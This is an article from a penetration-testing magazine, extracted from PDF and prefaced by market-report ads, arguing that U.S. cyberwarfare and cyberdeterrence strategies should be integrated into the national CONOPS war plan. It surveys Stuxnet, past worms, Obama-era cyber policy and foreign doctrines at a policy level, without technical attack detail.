Worldwide Tablet PC Present and Future Market Scope (2010 – 2015) and its Impact on Various
Sectors

Worldwide Vulnerability Assessment Market and 13 Companies Analysis

Web 2.0 (Social Networking, Professional Networking, Microblogging, Blogging, Online Dating)
Market World Worldwide & Future Forecast

Cloud Computing – SaaS, PaaS, IaaS Market, Mobile Cloud Computing, M&A, Investments, and
Future Forecast

Renub Research www.renub.com
Sharing Knowledge

WAR CAMP
46 http://pentestmag.com Page OPEN 05/2013
O
ne of the main disadvantages of the hy-
per-connected world of the 21
st
century is
the very real danger that countries, organi-
zations, and people who use networked computer
resources connected to the Internet face because
they are at risk of cyberattacks that could result in
one or more cyber threat dangers such as deni-
al of service, espionage, theft of confidential data,
destruction of data, and/or destruction of systems
and services. As a result of these cyber threats, the
national leaders and military of most modern coun-
tries have now recognized the potential for cyber-
attacks and cyberwar is very real and many are
hoping to counter these threats with modern tech-
nological tools using strategies and tactics under
a framework of cyberdeterrence, with which they
can deter the potential attacks associated with cy-
berwarfare.
Nature of the Threat
During my studies prior to and as a student in
this DET 630 – Cyberwarfare and Cyberdeter-
rence course at Bellevue University, it occurred to
me that considering the rapid evolution of the po-
tentially destructive capabilities of cyberweapons
and the complex nature of cyberdeterrence in the
21
st
century, it is now a critical priority to integrate
the cyberwarfare and cyberdeterrence plans into
the CONOPS plan. Indeed, if the strategic battle-
ground of the 21
st
century has now expanded to
include cyberspace, and the U.S. has in the last
five years ramped up major military commands,
training, personnel, and capabilities to support cy-
berwarfare and cyberdeterrence capabilities, the
inclusion of these capabilities should now be a crit-
ical priority of the Obama administration if has not
already happened.
How large a problem is this for the United
States?
Without the integration of cyberwarfare and cy-
berdeterrence technologies, strategies, and tac-
tics into the CONOPS Plan, the national com-
mand authorities run a grave risk of conducting a
poorly planned offensive cyberwarfare operation
that could precipitate a global crisis, impair rela-
tionships with its allies, and potentially unleash a
whole host of unintended negative and potentially
catastrophic consequences. In non-military terms,
at least four notable cyberspace events caused
widespread damages via the Internet because of
the rapid speed of their propagation, and their ap-
parently ruthless and indiscriminant selection of
vulnerable targets. They are 1) the Robert Morris
worm (U.S. origin, 1988); 2) the ILOVEYOU worm
(Philippines origin, 2000); the Code Red worm
Integration
of Cyberwarfare and Cyberdeterrence Strategies into the
U.S. CONOPS Plan to Maximize Responsible Control and
Effectiveness by the U. S. National Command Authorities
This paper deals with issues related to the present situation of lack
of a clearly defined national policy on the use of cyberweapons
and cyberdeterrence, as well as the urgent present need to include
strategies and tactics for cyberwarfare and cyberdeterrence into
the national CONOPS Plan, which is the national strategic war plan
for the United States.
47 http://pentestmag.com Page OPEN 05/2013
(U.S. origin, 2001); and the SQL Slammer worm
(U.S. origin, 2003). If not executed with great care
and forethought, a cyberweapons could potentially
unleash even greater damage on intended targets
and possible on unintended targets that were con-
nected via the Internet.
Other Not So Obvious Challenges for
Cyberweapons and Cyberdeterrence
The cyberspace threat and vulnerability landscape
is notable in that it is continually dynamic and
shifting. Those who are responsible for protect-
ing assets in cyberspace have many more chal-
lenges on their hands than their military counter-
parts who utilize weapons like guns, explosives,
artillery, missiles, etc. For example, there are by
some estimates over 350 new types of malware
that are manufactured each month. There are also
monthly patch updates to most Microsoft software
and operating systems, and phenomena such as
evil hackers and zero-day exploits are apparent-
ly never ending. Therefore, the inclusion of cyber-
weapons and cyberdeterrence capabilities into the
CONOPS Plan would require more frequent, rig-
orous, complex, and integrated testing to ensure
that it was always effective and up to date. In the
dynamic world of cyberspace with its constantly
shifting landscape of new capabilities, threats and
vulnerabilities, the coordination of the constant re-
fresh and testing of a CONOPS Plan that integrat-
ed these cyberwarfare and cyberdeterrence capa-
bilities would be no small feat. In addition, constant
intelligence gathering and reconnaissance would
need to be performed on suspected enemies to
ensure that our cyberweapons and cyberdeter-
rence capabilities would be in constant state of be-
ing able to deliver the intended effects for which
they were designed.
Is it a problem for other countries?
The careful planning and integration of cyberweap-
ons and cyberdeterrence is likely a challenge for
every country with these capabilities. For example,
much is already known about our potential adver-
saries, such as Russia, China and North Korea,
but what is perhaps less understood is the degree
to which they have been successful in integrating
cyberwarfare and cyberdeterrence capabilities into
their own national war plans. Nevertheless, due to
the previous extensive experience of Russia and
the U.S. with strategic war planning, it is more like-
ly that each of these countries stand the greatest
chance of making integrating cyberwarfare and cy-
berdeterrence capabilities into their respective war
plans. Yet, as recently as June 2009, it was clear
that the U.S. and Russia were unable to agree on
a treaty that would create the terms under which
cyberwarfare operations could and would be con-
ducted (Markoff and Kramer, 2009).
Is it problematic for these countries in the
same ways or is there variation? What kind?
Every country that is modern enough to have orga-
nizations, people, and assets that are connected
to computers and the Internet faces similar chal-
lenges of planning and managing cyberweapons
and cyberdeterrence, and the poorer the country,
the more significant the challenges. For example,
when a small group of hackers from Manila in the
Philippines unleashed the ILOVEYOU worm on
the Internet in 2000, it caused over $2 billion in
damages to computer data throughout the world.
Agents from the FBI went to Manila to track down
these people and investigate how and why the IL-
OVEYOU worm catastrophe occurred. To their sur-
prise, they learned that each of these hackers who
were involved could successfully escape prosecu-
tion because there were no laws in the Philippines
with which to prosecute them. So actually most
countries lack the technological and legal frame-
works with which to successfully build a coordi-
nated effort to manage the weapons and strate-
gies of cyberwarfare and cyberdeterrence, despite
the fact that most now embrace cyberspace with
all the positive economic benefits it offers for com-
merce and communications.
What are the consequences to the U.S. and
others if this threat is left unchecked?
As stated earlier, without the careful integration of
cyberwarfare and cyberdeterrence technologies,
strategies, and tactics into the CONOPS Plan, the
national command authorities run a grave risk of
launching a poorly planned offensive cyberwarfare
operation that could precipitate a global crisis, im-
pair relationships with its allies, and potentially un-
leash a whole host of unintended negative and po-
tentially catastrophic consequences.
What consequences has the threat already
produced on American/global society?
The absence of well-defined cyberwarfare and
cyberdeterrence strategies and tactics in the
CONOPS Plan has already produced some situ-
ations that have either damaged America’s image
abroad, or that could imperil its image and have
WAR CAMP
48 http://pentestmag.com Page OPEN 05/2013
far more negative consequences. For example,
operates such as Stuxnet, Flame, Duque, etc.,
might have either been better planned or possi-
bly not executed at all if cyberwarfare and cyber-
deterrence strategies and tactics were defined
in the CONOPS Plan. Also, the news media in-
dicated during the revolution in Libya that result-
ed in the fall of Qaddafi, cyberwarfare operations
were considered by the Obama administration.
The negative reactions and repercussions on the
world stage might have far outweighed any short
term advantages that could have resulted from a
successful set of cyberattacks against Libyan in-
frastructure assets that were attached to comput-
er networks. Again, a comprehensive CONOPS
Plan that included well-defined cyberwarfare and
cyberdeterrence strategies and tactics could have
prevented such possible cyberattacks from even
being considered, and it could have prevented
the news of the possible consideration being pub-
licized in the press (Schmitt, E. and Shanker, T.,
2011). Without such restraint and well-planned
deliberate actions, the U.S. runs the risk of ap-
pearing like the well-equipped cyber bully on the
world stage, and an adversary who is willing to
unleash weapons that can and will do crippling
damage to an opponent, using technologies that
are rapid, decisive, and not well-understood by
those for whom they are intended. A similar effect
and world reaction might be if U.S. Army infantry
troops were equipped with laser rifles that emitted
deadly laser blasts with pinpoint precision across
several hundred yards.
The Rapid Evolution of Cyberthreats
As predicted in the Technolytics chart below, cy-
berweapons have rapidly evolved over time.
Since Stuxnet was released in 2010, countries
and the general public are now aware of some of
the offensive, strategic and destructive capabilities
and potential of cyberweapons (Gelton, T., 2011).
The changes that produced Stuxnet and other
recent, more modern cyberweapons were a na-
tional resolve to excel in the cyberwarfare area,
coupled with excellent reconnaissance on de-
sired targets, and partnering with computer sci-
entists in Israel. The political consequences are
not well understood yet, except to say that the
U.S. and Israel are probably less trusted and
suspected of even greater future capabilities, as
well as having the will to use them. Again, having
well-planned cyberwarfare and cyberdeterrence
strategies and tactics defined in the CONOPS
Plan might indeed, restrain such possibly reck-
less decisions as to unleash cyberweapon at-
tacks without what the world might consider the
correct provocation.
Part 1 Final Thoughts about Cyberwarfare
Operations
In the words of Deb Radcliff, in an article published
in SC Magazine in September 2012, “we are al-
ready in a cyberwar” (Radcliff, D., 2012). But as
I was performing my research, it occurred to me
that a country like the U.S., might in the future un-
leash such a devastating cyberattack that it could
cripple the enemy’s ability to communicate sur-
render. I think that the moral implications of such
circumstances need to be justly considered as a
matter of the laws of war, because if a country con-
tinues to attack an enemy that has indicated that
they are defeated and want to surrender, this shifts
the moral ground from which the U.S. may have it
was conducting its cyberwarfare operations. This
is one other unintended consequence of cyberwar-
fare and one that needs to be carefully considered.
Part 2 – U.S. Policy Appraisal Related to
Cyberwarfare and Cyberdeterrence
This section will examine current U.S. Policy relat-
ed to cyberwarfare and cyberdeterrence.
Current U.S. Policy Covering Cyberwarfare
Threats
The current written policy related to cyberwarfare
threats can be found in President Obama’s De-
fense Strategic Guidance 2012, a 16-page poli-
cy documented that was published on January 3,
2012. The excerpt related specifically to cyberwar-
fare and cyber threats is shown below: Figure 1. Evolution of Cyberweapons (Technolytics, 2012)
49 http://pentestmag.com Page OPEN 05/2013
“To enable economic growth and commerce,
America, working in conjuncton with allies and
partners around the world, will seek to protect
freedom of access throughout the global com-
mons – those areas beyond natonal jurisdicton
that consttute the vital connectve tssue of the
internatonal system. Global security and prosper-
ity are increasingly dependent on the free fow of
goods shipped by air or sea. State and non-state
actors pose potental threats to access in the glob-
al commons, whether through oppositon to exist-
ing norms or other ant-access approaches. Both
state and non-state actors possess the capability
and intent to conduct cyber espionage and, po-
tentally, cyber atacks on the United States, with
possible severe efects on both our military opera-
tons and our homeland. Growth in the number of
space-faring natons is also leading to an increas-
ingly congested and contested space environment,
threatening safety and security. The United States
will contnue to lead global eforts with capable
allies and partners to assure access to and use of
the global commons, both by strengthening in-
ternatonal norms of responsible behavior and by
maintaining relevant and interoperable military
capabilites (Obama, 2012).”
The first explicit Obama Administration policy
acknowledging the realities of cyber threats were
published in a 30-page document titled Interna-
tional Strategy for Cyberspace in May 2011.
“Today, as natons and peoples harness the net-
works that are all around us, we have a choice.
We can either work together to realize their po-
tental for greater prosperity and security, or we
can succumb to narrow interests and undue fears
that limit progress. Cybersecurity is not an end
unto itself; it is instead an obligaton that our gov-
ernments and societes must take on willingly, to
ensure that innovaton contnues to fourish, drive
markets, and improve lives. While ofine chal-
lenges of crime and aggression have made their
way to the digital world, we will confront them
consistent with the principles we hold dear: free
speech and associaton, privacy, and the free fow
of informaton.
“The digital world is no longer a lawless fron-
ter, nor the province of a small elite. It is a place
where the norms of responsible, just, and peace-
ful conduct among states and peoples have be-
gun to take hold. It is one of the fnest examples
of a community self-organizing, as civil society,
academia, the private sector, and governments
work together democratcally to ensure its ef-
fectve management. Most important of all, this
space contnues to grow, develop, and promote
prosperity, security, and openness as it has since
its inventon. This is what sets the Internet apart
in the internatonal environment, and why it is so
important to protect.
“In this spirit, I ofer the United States’ Interna-
tonal Strategy for Cyberspace. This is not the frst
tme my Administraton has address the policy
challenges surrounding these technologies, but
it is the frst tme that our Naton has laid out an
approach that unifes our engagement with inter-
natonal partners on the full range of cyber issues.
And so this strategy outlines not only a vision for
the future of cyberspace, but an agenda for real-
izing it. It provides the context for our partners
at home and abroad to understand our priorites,
and how we can come together to preserve the
character of cyberspace and reduce the threats
we face (Obama, 2011).”
Though the Obama Administration reviewed and
approved President Bush’s CNCI policy in May
2009, Obama, who is regarded as the most tech-
nology-savvy president that has ever occupied the
White House, went much further to acknowledge
the importance of cyberspace to the American
economy and the American military, and the im-
portance of defending the U.S. from adversaries
that could threaten us via cyberspace. Obama’s
policy also acknowledges the reality that future
wars will be fought on the realm of cyberspace,
and has thus funded the preparation of the U.S.
armed forces to prepare for conflict in cyberspace
(Gerwitz, 2011).
What is the efectiveness of current policy
when it concerns this particular threat issue?
The Obama Administration’s policies have been
effective in raising the awareness of the U.S. pop-
ulation as to the importance of protecting assets
that are connected in cyberspace. These policies
have also been effective in providing for the prep-
aration of the U.S. military to deal with conflict in
WAR CAMP
50 http://pentestmag.com Page OPEN 05/2013
cyberspace. However, the present policy has not
been effective as a deterrence to cyber threats
presented by potential national enemies and non-
state actors. As recently as September 23, 2012 –
September 30, 2012, cyber attacks in the form of
distributed denial of service (DDOS) attacks from
the Middle East against several major U.S. banks
based have publicly demonstrated the ire of the at-
tackers and also the vulnerabilities of banks with
a customer presence in cyberspace (Strohm and
Engleman, 2012).
Short-Term and Long-term Ramifcations of
Current Policy
In the short-term, the Obama Administration’s pol-
icies regarding cyberspace have done much to
raise the awareness of cyberspace as an area that
requires protection for the public good and pros-
perity of the American people. These policies have
also served to show our allies and our potential en-
emies that the U.S. has the intention of defending
cyberspace and all our interests that are connect-
ed to it. In the long-term, these policies will proba-
bly evolve to reveal in a general, unclassified way,
stronger defenses, stronger deterrent capabilities
and probably offensive cyberweapons.
On the legislative front, as recently as Septem-
ber 23, 2012, Chairman of the Senate Homeland
Security Committee, Senator Joseph Lieberman
(D., Connecticut), realizing that Congress would
fail to pass cybersecurity legislation to designed
to help protect the United States and its people,
sent an urgent letter to President Obama to ask
for the creation of a new Presidential Executive
Order that would address several current cyber-
security issues, that includes how and when and
where law enforcement can become involved in
cybersecurity issues (Kerr, 2012). Though ma-
ny digital privacy rights advocates, including the
Electronic Frontier Foundation, the Electronic Pri-
vacy Information Center, and the American Civil
Liberties Union have strenuously fought recent
cybersecurity legislation, it is expected by many
cybersecurity experts that if President Obama is
reelected in November 2012, an Executive Or-
der drafted and signed by the Obama Administra-
tion provide the tools that the federal government
wants. Even if President Obama is not reelected
in November 2012, it is expected that some ex-
pedient action on the part of the new president
would probably take place even before Congress
could successfully agree upon and pass such leg-
islation.
Allies and Adversaries Connected to this
Specifc Policy?
It is entirely likely that there are classified ver-
sions of the International Strategy for Cyber-
space policy that address the nature of how U.S.
policies regarding the defense of cyberspace will
affect our allies and our adversaries. But since it
has been publicly revealed that the Obama Ad-
ministration has conducted offensive cyberwar-
fare operations against Iran between June 2009
and June 2010, it is also likely that both our al-
lies and our enemies have a clearer understand-
ing of U.S. capabilities as well as the intent to
use cyberweapons when it deems it is in its best
interests to do so.
Part 2 Conclusion
The good news is that President Obama and his
Administration apparently have an acute aware-
ness of the importance of the cyberspace to the
American economy and the American military.
The bad news is that because we are already in
some form of cyberwarfare that appears to be rap-
idly escalating, it remains to be seen what effects
these cyberattacks and the expected forthcoming
Executive Orders that address cybersecurity will
have on the American people and our way of life.
Nevertheless, it will be necessary to act prudently,
carefully balancing our freedoms with our need for
security, and also considering the importance of
enabling and protecting the prosperity of the now
electronically connected, free enterprise economy
that makes the U.S. the envy of and the model for
the rest of the world.
Part 3 – Strategic Comparative Analysis in
Cyberwarfare and Cyberdeterrence
This section will present a strategic compara-
tive analysis of the present state of cyberwarfare
and cyberdeterrence issues as that relate to oth-
er countries that could be considered adversaries,
now or in the not too distant future.
What Other Countries / Regions of the World
Are Concerned with This Same Threat Issue?
The countries that are primarily concerned with cy-
berwarfare and cyberdeterrence threat issues are
the same countries that already have the greatest
cyberwarfare capabilities and also the most to lose
in the event of a full-scale cyberwarfare attack.
The diagram below from a 2009 study shows the
comparative cyberwar capabilities of the 66 largest
countries in the world (Figure 2).
51 http://pentestmag.com Page OPEN 05/2013
Countries Regions of the World That Do Not
Place a High Priority on This Threat Issue
Countries that are more focused on the survival
and welfare of their citizens, coupled with the fact
that they are largely consumers of Internet and
computer capabilities versus being able to afford
to channel resources into the development of cy-
berweapons or the resources required to develop
a credible cyberdeterrence strategy. It is also ironic
that the U.K. with its stature and status does not
rank higher on the list shown in table 1.
Some of the Current Policies Being Employed
by These Other States / Regions in Regards to
the Threat
China, Russia, and India, each of which are in the
top four of the countries listed in Table 1, have
well-defined cyberwarfare policies and strategies.
Ironically, the U.S., which occupies the number 2
position in that same table, does not yet have well-
defined cyberwarfare policies and strategies. For
comparison, Table 2 below shows a summary of
the policies and strategies of China, Russia and
India.
Successes and Failures of the Various
Alternative Policies around the Globe
Despite some of the negative press from the Stux-
net virus, this collaborative effort by the U.S. and
Israel has been looked at with both fascination and
as an event that has quickly and successfully her-
alded in a new age of warfare, the age of cyber-
warfare. However, many still feel that in the ab-
sence of publically defined policies and strategies
by the Obama Administration, it invites a secretive
and even random appearance of and the contin-
ued use of cyberweapons (Sanger, 2012).
Areas of Joint Communication / Operation /
Cooperation that Exist or Should Exist Across
Countries Dealing with This Threat Issue
Apparently, the U.S. has already created one or
Figure 2. Country Cyber Capabilities Ratings (Technolytics, 2012)
more rather sophisticated cyber-
weapons with the help of Israeli cy-
berweapon experts. At least one of
these cyberweapons, the Stuxnet
Worm, was effectively used to im-
pede the development of Iran’s nu-
clear material refinement program
from 2009 to 2010 (Langer, 2010).
It is likely however, that through
the auspices of the United Nations,
or perhaps some G20 accord, there
may be some general consensus on
the importance of defining the appro-
priate uses cyberweapons. There al-
so needs to be some agreement on
types of response to cyberattacks,
and effective methods of cyberdeter-
rence.
China and Its Role in
Cyberwarfare Capabilities
China is probably doing a better job
than the realm of cyberwarfare for
three reasons: 1) the government
has invested considerable resources
into their cyberwarfare capabilities;
2) the number of personnel devoted
to cyberwarfare efforts is reportedly
in the tens of thousands; and 3) the
Chinese government is able to eas-
ily operate under a cloak of secrecy
and conduct operations without fear
WAR CAMP
52 http://pentestmag.com Page OPEN 05/2013
of cyberwarfare activities being leaked to Chinese
press agencies (Hagestad, 2012).
Part 3 Conclusion
This paper has presented a brief strategic compar-
ative analysis of countries with cyberwarfare ca-
pability.
Part 4 – Conflict Resolution in
Cyberwarfare and Cyberdeterrence
This section will present the ideas of conflict analy-
sis and resolution as they relate to cyberwarfare.
Current Academic Research on This Threat
Problem
Since 2007, as the existence of well-orchestrat-
ed cyberwar attacks such as the DDoS attacks
on Estonia (2007), Georgia (2008), and Kyrgyz-
stan (2009), as well as the Stuxnet (2010), Duqu
(2011), and Flame (2012) have all become known
to the world through security researchers, their vic-
tims, and the media. As a result, it has become ap-
parent most who are watching this area that cyber-
space has now become the new realm onto which
the field of international conflict has been extend-
ed, and that cyberwarfare is now no longer a theo-
retical issue that could one day threaten those par-
ticipants and systems that rely upon connections
to the Internet and Internet-connected networks.
Unfortunately however, the present findings and
research on cyberwarfare related events shows
that the U.S. is playing catch-up and doing so bad-
ly (Turanski and Husick, 2012).
Intellectual Positions and Theoretical
Explanations That Have Been Staked Out
on This Threat Problem
As recently as the 2008 – 2009 timeframe, John
Boyd’s conflict model known as Observe – Ori-
ent – Decide – Act (OODA) began to be applied
to analyze the ideas of “cybernetic warfare” and
“net-centric warfare.” The model itself has been
analyzed for its ability to simply demonstrate the
nature of the complexity of conflict, complete with
factors of ambiguity, unpredictability, and so the
model has also been used to define the nature of
life itself. Yet, the model is also impacted by the
chaotic nature of life and reality. The further shows
the similarity between actual cyberwarfare events
and this model. Other characteristics of the OO-
DA loop model are its continuous nature and the
feedback loops that provide data on which to base
some form (or forms) of decision and action. The
OODA Loop model is shown in the Figure 3.
Table 1. Summary of Cyberwarfare Policies and Strategies of China, Russia, and India
Country Policy Strategy
China China supports cyberwarfare capabilities, especially providing such ca-
pabilities in the People’s Liberation Army.
The Chinese will wage unrestricted warfa-
re and these are the principles:
Omni-directionality
Synchrony
Limited objectives
Unlimited measures
Asymmetry
Minimal consumption
Multi-dimensional coordination
Adjustment, control of the entire process
(Hagestad, 2012).
Russia Russia supports cyberwarfare capabilities, especially providing such ca-
pabilities in the Russian Army.
The nature of cyberwarfare and information warfare requires that the
development of a response to these challenges must be organized on
an interdisciplinary basis and include researchers from diferent bran-
ches – political analysts, sociologists, psychologists, military specialists,
and media representatives (Fayutkin, 2012).
The ability to achieve cyber superiority is
essential to victory in cyberspace. (Fayut-
kin, 2012).
India India supports cyberwarfare capabilities, especially providing such ca-
pabilities in the Indian Army.
“It is essential for efcient and efective conduct of war including cyber-
-war. The war book therefore needs to specify as how to maintain no-
-contact cyber war and when the government decide to go for full-con-
tact or partial-contact war then how cyber war will be integrated to me-
et overall war objectives (Saini, 2012).”
Strategies are still under development, but
will follow the guidance of policies related
to the conduct of war.
(Saini, 2012)
53 http://pentestmag.com Page OPEN 05/2013
However, one key distinction between Boyd’s
OODA model and cybernetic warfare is Boyd’s “fo-
cus on the conditions of emergence transformation
of systems through information rather than merely
the manner in which information is processed by
a fixed organizational schema.” Boyd would argue
that Claude Shannon and others tend to overem-
phasize the view of information related to structure
as opposed to information as a process (Bous-
quet, 2009).
Joint Publication (JP) 5-0, Joint Operation
Planning
As recently as December 2006, the Joint Chiefs
of Staff provided an inside look into how the U.S.
National War Plan was created and maintained.
In the document titled, Joint Publication (JP) 5-0,
Joint Operation Planning. While this publically
available, 264-page, document is unclassified, it
does provide an extraordinary look into the stra-
tegic military thinking, principles, and guidance of
the Joint Chiefs of Staff and the National Com-
mand Authorities as they create policies and
strategies that enforce the national strategic ob-
jectives of the United States. This document that
was created during the Bush administration is al-
so significant because it is one of the first official
publically known such documents that included
cyberspace as part of the operational realm of
conflict, along with air, sea, land, and space for
conducting military operations (U.S. DoD, JCS,
2006). The high-level diagram below shows sim-
ply the concept of the inputs and the outputs that
lead to understanding the operational environ-
ment of conflict, and it compares somewhat to the
OODA figure shown earlier: Figure 4.
To further illustrate the intent of the Joint Chiefs
of Staff to the Figure 5 to visually explain the in-
terconnected nature of the realms related to the
operational environment of conflict and the na-
ture of the systems analysis required for decision
making.
The JCS also described the environment of con-
flict as a place where simultaneity of operations
would and this environment would include the in-
formation environment and cyberspace:
“Simultaneity refers to the simultaneous applica-
ton of military and nonmilitary power against the
enemy’s key capabilites and sources of strength.
Simultaneity in joint force operatons contributes
directly to an enemy’s collapse by placing more
demands on enemy forces and functons than can
be handled. This does not mean that all elements
of the joint force are employed with equal priority
or that even all elements of the joint force will be
employed. It refers specifcally to the concept of
atacking appropriate enemy forces and functons
throughout the OA (across the physical domains
and the informaton environment [which includes
cyberspace]) in such a manner as to cause failure
of their moral and physical cohesion (U.S. DoD,
JCS, 2006).”
Therefore, the JCS also created a Course of Ac-
tion framework for determining the best courses of
action in a conflict environment, and here again,
cyberspace is included in that realm of options in
which a course of action could and would be devel-
oped (U.S. DoD, JCS, 2006) (Figure 6).
Figure 3. Boyd’s OODA Loop Model (Bousquet, 2009)
WAR CAMP
54 http://pentestmag.com Page OPEN 05/2013
Options in Confict
Based on the current state of
where the U.S. stands with the
lack of coherent and cohesive
incorporated into its National
CONOPSPLAN, and the po-
tential for unintended conse-
quences where the unilateral
use of cyberweapons can and
will occur, I see three possible
options for the U.S., and each
of these options has advantag-
es and disadvantages.
Part 4 Conclusion
This section has presented a
brief look at the U.S. Military’s
recognition of cyberspace as an
extension of the operational en-
vironment of conflict and a com-
parison of the options that ex-
ist for resolving the issues that
threaten America’s ability to cre-
ate the coherent and cohesive
policies and strategies that will
define its ability to effectively
conduct cyberwarfare and cy-
berdeterrence in the future.
Part 5 – Policy Generation
Related to Cyberwarfare
and Cyberdeterrence
This section will present the
ideas for the creation of nation-
al policy or enhancement of
existing national policy related
to cyberwarfare and cyberde-
terrence issues.
Current U.S. Policy Covering
Cyberwarfare Threats
As started earlier in the Part 2
– Policy Analysis, the current
written policy related to cyber-
warfare threats can be found
in President Obama’s Defense
Strategic Guidance 2012, a
16-page policy documented that
was published on January 3,
2012. It has already been noted
that this policy has not been ef-
fective in deterring cyberattacks
and other acts of cyberwar.
Figure 4. Understanding the Operational Environment (U.S. DoD, JCS, 2006)
Figure 5. Understanding the Interconnected Nature of the Realms Related to the
Operational Environment of Confict and the Nature of the Systems Analysis Required for
Decision Making (U.S. DoD, JCS, 2006)
55 http://pentestmag.com Page OPEN 05/2013
Challenges Related to Cyberwar and
Cyberdeterrence Policy and Strategy Creation
The creation of policies and strategies related to
cyberwar and cyberdeterrence are complicated by
six major issues:
1. The lack of international defnition and agree-
ment on what constitutes an act of cyberwar
(Markoff and Kramer, 2009).
2. The lack of the ability to clearly attribute the
source of an attack (Turzanski and Husick,
2012).
3. The ability for non-state actors to conduct
potent cyberattacks (Turzanski and Husick,
2012).
4. The inability to clearly defne what the exact
nature of critical infrastructure targets (Turzan-
ski and Husick, 2012).
5. The massive proliferation and reliance on of
ubiquitous, highly insecure, vulnerable sys-
tems based on SCADA technologies during
the 1980s and 1990s (Turzanski and Husick,
2012).
6. The continually changing landscape of infor-
mation technology including the vulnerabilities
and threats related to systems that are obso-
lete, yet remain in operational use for several
years past their intended useful life.
A Single Integrated Operational Plan for War
During the 1950s and 1960s, when it became evi-
dent that nuclear weapons could play a major role
in strategic warfare, the United States, utilized a
think-tank of individuals, both military and civilian,
to craft the strategic war-fighting plans of the U.S.
that would deal with very real possibility that tacti-
cal and possibly strategic nuclear weapons may be
required during a major wartime scenario. The first
such war plan was called the Single Integrated Op-
erational Plan (SIOP). The process of its creation
involved the use of intelligence data about potential
enemies, a threat assessment process, and then a
process whereby the identified likely targets would
be prioritized and matched with weapons. The pro-
cess of matching weapons to targets also included
intricate sequence timings, and the various event
triggers that would result in the execution of such
attacks. In the 1980s, the SIOP evolved into some-
thing called the OPSPLAN and later, it was re-
named the CONOPS Plan, but it has always been
kept up to date and tested at least semiannually so
that all involved would know their roles if the na-
tion command authorities deemed it necessary to
execute this intricate war plan (Freedman, 2003).
Note that as far back as the 1970s, there were
24 defined levels of conflict between the U.S. and
a potential adversary, ranging from a war of words,
Figure 6. Course of Action Development (U.S. DoD, JCS, 2006)
WAR CAMP
56 http://pentestmag.com Page OPEN 05/2013
all the way to strategic nuclear war. No matter what
the name of it was, the national war plan has al-
ways been a key tool of the national command au-
thorities for understanding what military responses
would be required in the event of these various lev-
els of conflict.
Recommendations for the U.S. Cyberwarfare
Policy and Strategy
It is not unreasonable to assume that the path to-
wards a coherent and cohesive U.S. policy and set
of strategies regarding the use of cyberweapons
will follow a path that is similar to the strategic war
plan maturity path from Hiroshima to the SIOP. To-
day, in the absence of any clear policy on the use
of cyberweapons, Crosston advocates the agree-
ment on a policy of “Mutually Assured Debilitation”
in which everyone with cyberweapons would come
to a general understanding that the use of these
weapons would result in the expectation that mas-
sive destruction would be unleashed on every par-
ticipant’s assets (Crosston, 2011). This makes per-
fect sense considering that the “Mutually Assured
Destruction” nuclear deterrence policy was effec-
tive and worked well during the Cold War from the
1950s through 1990s.
Yet, today, I believe that once a coherent and
cohesive U.S. policy on cyberwarfare and cyber-
weapons is defined by the National Command Au-
thorities, there should be an eight-step process that
could result in the development and rapid matura-
tion of a strong national strategy U.S. Cyberwarfare:
1. Defne the doctrines and principles related to
cyberwarfare and the needs under which cy-
berwarfare would be conducted.
2. Create the policies that embody these doc-
trines and principles.
3. Conduct the intelligence gathering to accu-
rately understand the landscape of the cyber
battlefeld.
4. Perform the analysis to create the strategy
5. Create the strategic plan and tactics
6. Conduct regular war games, at least twice
yearly to test the strategic plan and tactics
7. Analyze and document the results of the cy-
berwarfare war games.
8. Refne the strategies and tactics for cyberwar-
fare and cyberdeterrence based on the results
of analyzing the outcomes of the cyberwarfare
war games
Note that it is also essential to continually assess
the capabilities of Information Technology so that
tools that our cyberwarfare fghters are using are
state of the art and that they are effective and
perform well as they are integrated into the cyber-
war war fghting environment.
Recommendations for the U.S.
Cyberdeterrence Policy and Strategy
A strongly worded, explicit U.S. national policy re-
garding cyber deterrence would serve to further
strengthen the U.S. in cyberspace as well as pro-
tect critical infrastructure and our allies. According
to a 1997 paper that was prepared by the U.S. Ar-
my for the Clinton administration, Toward Deter-
rence in the Cyber Dimension these would be rec-
ommended elements of such a policy:
1. Continue to design, create, possess, and use
offensive cyber warfare capabilities when nec-
essary
2. Develop a defensive system for surveillance,
assessment, and warning of a cyber attack. (I
think such capability presently exists now)
Table 2. Comparing Options for Incorporating Cyberwar and Cyberdeterrence Policies and Strategies into the U.S. National
CONOPS Plan
Option Description Advantage Disadvantage
1 Create policies that mandate the inclusion of cyber-
warfare and cyberdeterrence into the U.S. National
CONOPS Plan
Prevents unintended consequences
of unilateral use or unplanned use
of cyberweapons
Takes time, politics, skills,
knowledge, and money
2 Limited creation and application of policies that
mandate the inclusion of cyberwarfare and cyberde-
terrence into the U.S. National CONOPS Plan
Prevents some possible unintended
consequences of unilateral use or
unplanned use of cyberweapons
Still requires some time,
political wrangling, skills,
knowledge, and money
3 Do nothing whatsoever related to cyberweapons
and U.S. National CONOPS Plan. Just continue to the
present trend to continue to conduct cyberwarfa-
re operations on an ad hoc basis in secrecy, and al-
low the situation with current cyberwarfare threats
to continue (Sanger, 2012).
Saves time, political wrangling, and
money
Unintended conse-qu-
ences of unilateral use or
unplanned use of cyber-
weapons
57 http://pentestmag.com Page OPEN 05/2013
3. A declaration that any act of deliberate in-
formation warfare resulting in the loss of life
or signifcant destruction of property will be
met with a devastating response (U.S. Army,
1997).
4. I would also include Crosston’s idea of Mutual-
ly Assured Debilitation (Crosston, 2011).
Final Thoughts on the Creation of a National
Policy on Cyberwar and Cyberdeterrence
According to Kramer, the table below contains the
10-step remedy for creating a policy that would
protect the U.S. in cyberspace.
Part 5 Conclusion
This section has presented a brief look at the
importance of creating a set of publicly avail-
able, coherent and cohesive national policies
and strategies that will facilitate U.S. capabilities
to effectively conduct cyberwarfare and cyber-
deterrence operations now and in the future. At
the present moment, the lack of such policies ef-
fectively represents a window of risk and uncer-
tainty during a time when cyber threats and cy-
ber attacks are growing at an exponential rate.
That has the elements of a real potential for a
cyber disaster if this weak policy situation is not
resolved as soon as possible. Here, I presented
a set of processes and a framework by which the
U.S. can quickly address the national challenges
of effectively creating the urgently needed na-
tional policies and integrated strategies for con-
ducting cyberwarfare and cyberdeterrence oper-
ations now and in the future.
Conclusion
This paper has presented a brief look at the im-
portance of creating a clear set of publicly avail-
able, coherent and cohesive national policy. It
then advocated the incorporation of strategies
that will address U.S. intentions and capabilities
to effectively conduct cyberwarfare and cyberde-
terrence operations now and in the future, into the
U.S. CONOPS Plan.
References
• Bousquet, A. (2009). The Scientifc Way of Warfare: Order and
Chaos on the Battlefelds of Modernity. New York, NY: Columbia
University Press.
